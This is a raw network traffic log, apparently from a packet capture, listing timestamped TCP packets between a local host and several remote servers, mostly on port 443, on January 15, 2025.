                                                                                                                                            Jan 15, 2025 19:14:40.043673038 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.043715000 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.043726921 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.043756962 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.043780088 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.043833017 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.043845892 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.043893099 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.044519901 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.044591904 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.044616938 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.044677973 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.045181990 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.045265913 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.045303106 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.045347929 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.045357943 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.045388937 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.045419931 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.045425892 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.045465946 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.045527935 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.045558929 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.045618057 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.046803951 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.047044039 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.047092915 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.047095060 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.047105074 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.047143936 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.047152042 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.047816992 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.047868013 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.047878027 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.047885895 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.047930956 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.047934055 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.047943115 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.047991037 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.047997952 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.048717022 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.048768044 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.048778057 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.048784971 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.048834085 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.048847914 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.048856020 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.048898935 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.050066948 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.050137043 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.050429106 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.050436020 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.072978020 CET49877443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:40.073065042 CET44349877188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.073174000 CET49877443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:40.073368073 CET49877443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:40.073390007 CET44349877188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.074630976 CET49878443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:40.074681044 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.074738979 CET49878443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:40.074913979 CET49878443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:40.074929953 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.084949970 CET44349871104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.085019112 CET44349871104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.085072994 CET44349871104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.085186005 CET49871443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.085716963 CET49871443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.085781097 CET44349871104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.085830927 CET49879443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.085841894 CET44349879104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.085901022 CET49879443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.086174965 CET49879443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.086185932 CET44349879104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.086858034 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.086991072 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.087066889 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.087066889 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.087130070 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.087174892 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.087239027 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.087521076 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.087549925 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.087752104 CET49880443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.087779045 CET44349880104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.087833881 CET49880443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.088177919 CET49880443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.088190079 CET44349880104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.092336893 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.102726936 CET44349872104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.102965117 CET49872443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.102983952 CET44349872104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.104374886 CET44349872104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.104846954 CET49872443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.104846954 CET49872443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.104999065 CET44349872104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.132298946 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.132478952 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.132529974 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.132535934 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.132550955 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.132591963 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.132605076 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.133805990 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.133876085 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.133891106 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.133963108 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.134015083 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.134016037 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.134025097 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.134053946 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.134074926 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.134120941 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.134125948 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.134135008 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.134166002 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.134443998 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.134481907 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.134499073 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.134505987 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.134536028 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.134596109 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.134660006 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.134848118 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.134860992 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.155338049 CET49872443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.221616030 CET49881443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.221698999 CET44349881104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.221946001 CET49881443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.222165108 CET49881443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.222181082 CET44349881104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.273066044 CET49882443192.168.2.1634.120.195.249
                                                                                                                                            Jan 15, 2025 19:14:40.273158073 CET4434988234.120.195.249192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.273264885 CET49882443192.168.2.1634.120.195.249
                                                                                                                                            Jan 15, 2025 19:14:40.273474932 CET49882443192.168.2.1634.120.195.249
                                                                                                                                            Jan 15, 2025 19:14:40.273514032 CET4434988234.120.195.249192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.275063038 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.275119066 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.275285006 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.275474072 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.275487900 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.285737038 CET44349872104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.285876989 CET44349872104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.285990000 CET49872443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.286031008 CET44349872104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.286120892 CET44349872104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.286184072 CET49872443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.286746979 CET49872443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.286772966 CET44349872104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.287059069 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.287090063 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.287262917 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.287609100 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.287623882 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.397478104 CET44349874104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.397783041 CET49874443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.397808075 CET44349874104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.398907900 CET44349874104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.399308920 CET49874443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.399458885 CET49874443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.399463892 CET44349874104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.399497032 CET44349874104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.404891014 CET44349873104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.405204058 CET49873443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.405273914 CET44349873104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.405642033 CET44349873104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.405920982 CET49873443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.405998945 CET49873443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.406008959 CET44349873104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.439340115 CET49874443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.448889971 CET44349875104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.449294090 CET49875443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.449358940 CET44349875104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.450500011 CET44349875104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.450822115 CET49875443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.450953960 CET49875443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.451010942 CET44349875104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.451337099 CET44349873104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.454350948 CET49873443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.454514027 CET4968080192.168.2.16192.229.211.108
                                                                                                                                            Jan 15, 2025 19:14:40.474730015 CET44349876104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.474980116 CET49876443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.475011110 CET44349876104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.475716114 CET44349876104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.476845980 CET49876443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.476946115 CET44349876104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.476984024 CET49876443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.502336979 CET49875443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.517399073 CET49876443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.517430067 CET44349876104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.517462969 CET49678443192.168.2.1620.189.173.10
                                                                                                                                            Jan 15, 2025 19:14:40.548707962 CET44349879104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.548993111 CET49879443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.549022913 CET44349879104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.550383091 CET44349879104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.550455093 CET49879443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.550832033 CET49879443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.550895929 CET44349879104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.550972939 CET49879443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.550981045 CET44349879104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.561718941 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.561938047 CET49878443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:40.561944962 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.562983036 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.563044071 CET49878443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:40.564059973 CET49878443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:40.564202070 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.564240932 CET49878443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:40.564815998 CET44349873104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.564860106 CET44349873104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.564894915 CET44349873104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.564934015 CET44349873104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.564959049 CET49873443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.564965963 CET44349873104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.565032959 CET44349873104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.565069914 CET49873443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.565094948 CET49873443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.565478086 CET44349873104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.565783978 CET44349873104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.565840006 CET44349873104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.565896034 CET49873443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.565996885 CET49873443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.566028118 CET44349873104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.569197893 CET44349880104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.569410086 CET49880443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.569431067 CET44349880104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.572964907 CET44349880104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.573049068 CET49880443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.573663950 CET49880443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.573838949 CET44349880104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.573846102 CET49880443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.596338034 CET49879443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.596853018 CET44349877188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.597652912 CET49877443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:40.597681046 CET44349877188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.601397038 CET44349877188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.601500034 CET49877443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:40.601763010 CET49877443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:40.601933956 CET44349877188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.611330986 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.612322092 CET49878443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:40.612339020 CET44349878188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.619330883 CET44349880104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.628314018 CET49880443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.628339052 CET44349880104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.644345045 CET49877443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:40.644376040 CET44349877188.114.96.3192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.660322905 CET49878443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:40.676336050 CET49880443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.691349030 CET49877443192.168.2.16188.114.96.3
                                                                                                                                            Jan 15, 2025 19:14:40.755366087 CET4968080192.168.2.16192.229.211.108
                                                                                                                                            Jan 15, 2025 19:14:40.807123899 CET44349875104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.807216883 CET44349876104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.807228088 CET44349875104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.807307005 CET49875443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.807642937 CET44349874104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.807776928 CET44349874104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.807832003 CET49874443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.807857037 CET44349874104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.807917118 CET44349874104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.807919025 CET44349879104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.807966948 CET44349879104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.807976961 CET49874443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.807984114 CET44349874104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.808013916 CET49879443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.808043003 CET44349879104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.808057070 CET44349874104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.808058977 CET44349879104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.808075905 CET44349880104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.808099031 CET49874443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.808105946 CET44349874104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.808131933 CET49879443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.808191061 CET44349880104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.808204889 CET44349874104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.808233023 CET49880443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.808248043 CET49874443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.808254957 CET44349874104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.808629036 CET44349876104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.808677912 CET44349876104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.808703899 CET49876443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.808716059 CET44349876104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.808872938 CET49876443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.808901072 CET44349876104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.808979988 CET44349876104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.809259892 CET49875443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.809277058 CET49876443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.809289932 CET44349875104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.810184956 CET49876443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.810200930 CET44349876104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.810379028 CET44349881104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.811007977 CET49881443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.811022997 CET44349881104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.811239004 CET49879443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.811255932 CET44349879104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.811512947 CET44349881104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.811606884 CET49880443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.811630964 CET44349880104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.811892033 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.812072992 CET49881443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.812139988 CET44349881104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.812268019 CET44349874104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.812329054 CET49874443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.812344074 CET44349874104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.812354088 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.812361956 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.812433004 CET44349874104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.812479973 CET49874443192.168.2.16104.18.69.40
